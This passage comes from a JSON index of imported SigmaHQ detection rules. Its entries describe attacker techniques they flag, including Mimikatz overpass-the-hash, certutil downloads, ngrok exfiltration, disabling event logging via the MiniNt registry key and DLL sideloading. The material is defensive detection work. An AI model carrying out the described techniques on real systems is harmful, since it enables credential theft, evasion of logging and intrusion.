"rules/windows/builtin/system/netlogon/win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" } }, { "id": "sigmahq-sigma-1908fcc1-1b92-4272-8214-0fbaf2fa5163", "type": "detection", "name": "Malicious DLL File Dropped in the Teams or OneDrive Folder", "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (\"iphlpapi.dll\") is sideloaded", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/malicious-dll-file-dropped-in-the-teams-or-onedrive-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_iphlpapi_dll_sideloading.yml" } }, { "id": "sigmahq-sigma-19128e5e-4743-48dc-bd97-52e5775af817", "type": "detection", "name": "Azure AD Account Credential Leaked", "description": "Indicates that the user's valid credentials have been leaked.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1589" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-ad-account-credential-leaked.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "19128e5e-4743-48dc-bd97-52e5775af817", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/identity_protection/azure_identity_protection_leaked_credentials.yml" } }, { "id": "sigmahq-sigma-192a0330-c20b-4356-90b6-7b7049ae0b87", "type": "detection", "name": "Successful Overpass the Hash Attempt", "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1550.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/successful-overpass-the-hash-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "192a0330-c20b-4356-90b6-7b7049ae0b87", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/account_management/win_security_overpass_the_hash.yml" } }, { "id": "sigmahq-sigma-193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", "type": "detection", "name": "Xwizard.EXE Execution From Non-Default Location", "description": "Detects the execution of Xwizard tool from a non-default directory.\nWhen executed from a non-default directory, this utility can be abused in order to side load a custom version of \"xwizards.dll\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/xwizard-exe-execution-from-non-default-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_xwizard_execution_non_default_location.yml" } }, { "id": "sigmahq-sigma-195626f3-5f1b-4403-93b7-e6cfd4d6a078", "type": "detection", "name": "Suspicious SSL Connection", "description": "Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1573" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-ssl-connection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "195626f3-5f1b-4403-93b7-e6cfd4d6a078", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_ssl_keyword.yml" } }, { "id": "sigmahq-sigma-195c1119-ef07-4909-bb12-e66f5e07bf3c", "type": "detection", "name": "Download from Suspicious Dyndns Hosts", "description": "Detects download of certain file types from hosts with dynamic DNS names (selected list)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105", "T1568" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/download-from-suspicious-dyndns-hosts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "195c1119-ef07-4909-bb12-e66f5e07bf3c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_download_susp_dyndns.yml" } }, { "id": "sigmahq-sigma-195e1b9d-bfc2-4ffa-ab4e-35aef69815f8", "type": "detection", "name": "Bitbucket Full Data Export Triggered", "description": "Detects when full data export is attempted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1213.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bitbucket-full-data-export-triggered.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "195e1b9d-bfc2-4ffa-ab4e-35aef69815f8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/bitbucket/audit/bitbucket_audit_full_data_export_triggered.yml" } }, { "id": "sigmahq-sigma-198effb6-6c98-4d0c-9ea3-451fa143c45c", "type": "detection", "name": "Run Once Task Execution as Configured in Registry", "description": "This rule detects the execution of Run Once task as configured in the registry", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/run-once-task-execution-as-configured-in-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "198effb6-6c98-4d0c-9ea3-451fa143c45c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_runonce_execution.yml" } }, { "id": "sigmahq-sigma-19951c21-229d-4ccb-8774-b993c3ff3c5c", "type": "detection", "name": "Okta API Token Created", "description": "Detects when a API token is created", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/okta-api-token-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "19951c21-229d-4ccb-8774-b993c3ff3c5c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_api_token_created.yml" } }, { "id": "sigmahq-sigma-19aa4f58-94ca-45ff-bc34-92e533c0994a", "type": "detection", "name": "Suspicious User-Agents Related To Recon Tools", "description": "Detects known suspicious (default) user-agents related to scanning/recon tools", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-user-agents-related-to-recon-tools.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "19aa4f58-94ca-45ff-bc34-92e533c0994a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/webserver_generic/web_susp_useragents.yml" } }, { "id": "sigmahq-sigma-19aefed0-ffd4-47dc-a7fc-f8b1425e84f9", "type": "detection", "name": "Python SQL Exceptions", "description": "Generic rule for SQL exceptions in Python according to PEP 249", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/python-sql-exceptions.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "19aefed0-ffd4-47dc-a7fc-f8b1425e84f9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/python/app_python_sql_exceptions.yml" } }, { "id": "sigmahq-sigma-19b041f6-e583-40dc-b842-d6fa8011493f", "type": "detection", "name": "HackTool Named File Stream Created", "description": "Detects the creation of a named file stream with the imphash of a well-known hack tool", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-named-file-stream-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "19b041f6-e583-40dc-b842-d6fa8011493f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_stream_hash/create_stream_hash_hktl_generic_download.yml" } }, { "id": "sigmahq-sigma-19b08b1c-861d-4e75-a1ef-ea0c1baf202b", "type": "detection", "name": "Suspicious Download Via Certutil.EXE", "description": "Detects the execution of certutil with certain flags that allow the utility to download files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-download-via-certutil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "19b08b1c-861d-4e75-a1ef-ea0c1baf202b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_certutil_download.yml" } }, { "id": "sigmahq-sigma-19bf6fdb-7721-4f3d-867f-53467f6a5db6", "type": "detection", "name": "Communication To Ngrok Tunneling Service - Linux", "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1567", "T1568.002", "T1572", "T1090", "T1102" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/communication-to-ngrok-tunneling-service-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "19bf6fdb-7721-4f3d-867f-53467f6a5db6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml" } }, { "id": "sigmahq-sigma-1a0a2ff1-611b-4dac-8216-8a7b47c618a6", "type": "detection", "name": "Invoke-Obfuscation Via Use Clip - Security", "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-via-use-clip-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_clip_services_security.yml" } }, { "id": "sigmahq-sigma-1a0d4aba-7668-4365-9ce4-6d79ab088dfd", "type": "detection", "name": "Ping Hex IP", "description": "Detects a ping command that uses a hex encoded IP address", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1140", "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ping-hex-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_ping_hex_ip.yml" } }, { "id": "sigmahq-sigma-1a1ed54a-2ba4-4221-94d5-01dee560d71e", "type": "detection", "name": "Renamed CreateDump Utility Execution", "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036", "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-createdump-utility-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_createdump.yml" } }, { "id": "sigmahq-sigma-1a2d6c47-75b0-45bd-b133-2c0be75349fd", "type": "detection", "name": "Wdigest CredGuard Registry Modification", "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wdigest-credguard-registry-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml" } }, { "id": "sigmahq-sigma-1a2ea919-d11d-4d1e-8535-06cda13be20f", "type": "detection", "name": "Triple Cross eBPF Rootkit Default Persistence", "description": "Detects the creation of \"ebpfbackdoor\" files in both \"cron.d\" and \"sudoers.d\" directories. Which both are related to the TripleCross persistence method", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/triple-cross-ebpf-rootkit-default-persistence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1a2ea919-d11d-4d1e-8535-06cda13be20f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/file_event/file_event_lnx_triple_cross_rootkit_persistence.yml" } }, { "id": "sigmahq-sigma-1a31b18a-f00c-4061-9900-f735b96c99fc", "type": "detection", "name": "Remote Access Tool Services Have Been Installed - System", "description": "Detects service installation of different remote access tools software. These software are often abused by threat actors to perform", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003", "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-services-have-been-installed-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1a31b18a-f00c-4061-9900-f735b96c99fc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_remote_access_software.yml" } }, { "id": "sigmahq-sigma-1a41023f-1e70-4026-921a-4d9341a9038e", "type": "detection", "name": "Atypical Travel", "description": "Identifies two sign-ins originating from geographically distant locations, where at least one of the locations may also be atypical for the user, given past behavior.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/atypical-travel.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1a41023f-1e70-4026-921a-4d9341a9038e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/identity_protection/azure_identity_protection_atypical_travel.yml" } }, { "id": "sigmahq-sigma-1a42dfa6-6cb2-4df9-9b48-295be477e835", "type": "detection", "name": "Vulnerable WinRing0 Driver Load", "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/vulnerable-winring0-driver-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1a42dfa6-6cb2-4df9-9b48-295be477e835", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/driver_load/driver_load_win_vuln_winring0_driver.yml" } }, { "id": "sigmahq-sigma-1a4bd6af-99ac-4466-b5b2-7b72b4a05462", "type": "detection", "name": "Security Event Logging Disabled via MiniNt Registry Key - Process", "description": "Detects attempts to disable security event logging by adding the `MiniNt` registry key.\nThis key is used to disable the Windows Event Log service, which collects and stores event logs from the operating system and applications.\nAdversaries may want to disable this service to prevent logging of security events that could be used to detect their activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.001", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/security-event-logging-disabled-via-minint-registry-key-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1a4bd6af-99ac-4466-b5b2-7b72b4a05462", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_event_logging_disable_via_key_minint.yml" } }, { "id": "sigmahq-sigma-1a4bd6e3-4c6e-405d-a9a3-53a116e341d4", "type": "detection", "name": "USB Device Plugged", "description": "Detects plugged/unplugged USB devices", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1200" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/usb-device-plugged.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1a4bd6e3-4c6e-405d-a9a3-53a116e341d4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/driverframeworks/win_usb_device_plugged.yml" } }, { "id": "sigmahq-sigma-1a5c46e9-f32f-42f7-b2bc-6e9084db7fbf", "type": "detection", "name": "Trust Access Disable For VBApplications", "description": "Detects registry changes to Microsoft Office \"AccessVBOM\" to a value of \"1\" which disables trust access for VBA on the victim machine and lets attackers execute malicious macros without any Microsoft Office warnings.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/trust-access-disable-for-vbapplications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1a5c46e9-f32f-42f7-b2bc-6e9084db7fbf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_office_access_vbom_tamper.yml" } }, { "id": "sigmahq-sigma-1a5fefe6-734f-452e-a07d-fc1c35bce4b2", "type": "detection", "name": "Firewall Rule Deleted Via Netsh.EXE", "description": "Detects the removal of a port or application rule in the Windows Firewall configuration using netsh", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/firewall-rule-deleted-via-netsh-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1a5fefe6-734f-452e-a07d-fc1c35bce4b2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_netsh_fw_delete_rule.yml" } }, { "id": "sigmahq-sigma-1a9bb21a-1bb5-42d7-aa05-3219c7c8f47d", "type": "detection", "name": "PUA - Advanced IP/Port Scanner Update Check", "description": "Detect the update check performed by Advanced IP/Port Scanner utilities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1590" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-advanced-ip-port-scanner-update-check.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1a9bb21a-1bb5-42d7-aa05-3219c7c8f47d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_pua_advanced_ip_scanner_update_check.yml" } }, { "id": "sigmahq-sigma-1ab3c5ed-5baf-417b-bb6b-78ca33f6c3df", "type": "detection", "name": "AWS EC2 Startup Shell Script Change", "description": "Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1059.003", "T1059.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-ec2-startup-shell-script-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1ab3c5ed-5baf-417b-bb6b-78ca33f6c3df", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_ec2_startup_script_change.yml" } }, { "id": "sigmahq-sigma-1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", "type": "detection", "name": "Winrar Compressing Dump Files", "description": "Detects execution of WinRAR in order to compress a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1560.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/winrar-compressing-dump-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_winrar_exfil_dmp_files.yml" } }, { "id": "sigmahq-sigma-1ac8666b-046f-4201-8aba-1951aaec03a3", "type": "detection", "name": "Command Line Execution with Suspicious URL and AppData Strings", "description": "Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.003", "T1059.001", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/command-line-execution-with-suspicious-url-and-appdata-strings.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1ac8666b-046f-4201-8aba-1951aaec03a3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_http_appdata.yml" } }, { "id": "sigmahq-sigma-1ae64f96-72b6-48b3-ad3d-e71dff6c6398", "type": "detection", "name": "Suspicious External WebDAV Execution", "description": "Detects executables launched from external WebDAV shares using the WebDAV Explorer integration, commonly seen in initial access campaigns.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1584", "T1566" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-external-webdav-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1ae64f96-72b6-48b3-ad3d-e71dff6c6398", "source_commit": "df5c6a6", "license": 